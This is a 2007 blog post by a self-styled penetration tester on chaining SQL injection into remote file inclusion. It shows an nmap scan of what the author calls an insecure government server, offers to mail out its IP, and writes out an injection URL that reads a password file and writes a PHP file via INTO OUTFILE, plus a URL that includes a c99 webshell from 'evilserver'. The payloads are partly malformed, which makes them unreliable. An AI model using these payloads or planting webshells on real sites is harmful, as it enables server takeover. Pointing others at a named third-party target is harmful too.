what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Thursday, May 10, 2007

ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE

These are on the comments and previews done, so i will try explain the way i can best about it.

They best way to defend it is to have port 3306 filtered.....(check that server, top goverment but one of the most insecure) mail me if u need the ip.

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt


.........and have the latest Kernel patch in your Box. Aslong as an RFI bug may be in yah site, or lets say your CMS, a knowledgable hacker will still get thru, so even a strong password wouldn't be a big deal if he is browsing your server on Port 80. The only thing that really helped last year from these kind of attacks was to have yah php safe_mode ON (secure) but these days there are so many ways of bypassing it, Lol!

This was well shown after the month of PHP bugs, January and Feb this year after the release of alot of POCs to the public by Hardened PHP and other communities.

To all, the best way to secure yah BOX, is to know how an intruder will get thru, by doing all types of Pentest Attacks, whether Black Box or White Box penetration testing.

Something else, before i go, SQL INJECTION, can help an attacker to build up an RFI attack on a server, by tring an injection where he is able to browse files: load_file('etc/password') and create his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select
+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home
/www/public/http/vul.php'/*

So we will have another file in the server named vul.php, which will have a straight rfi bug.

So remote include with a c99shell,or c100, r57 and other privated moded webshells.

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that needs alot experience.

Tried to explain in Example.

/Chuks

No comments: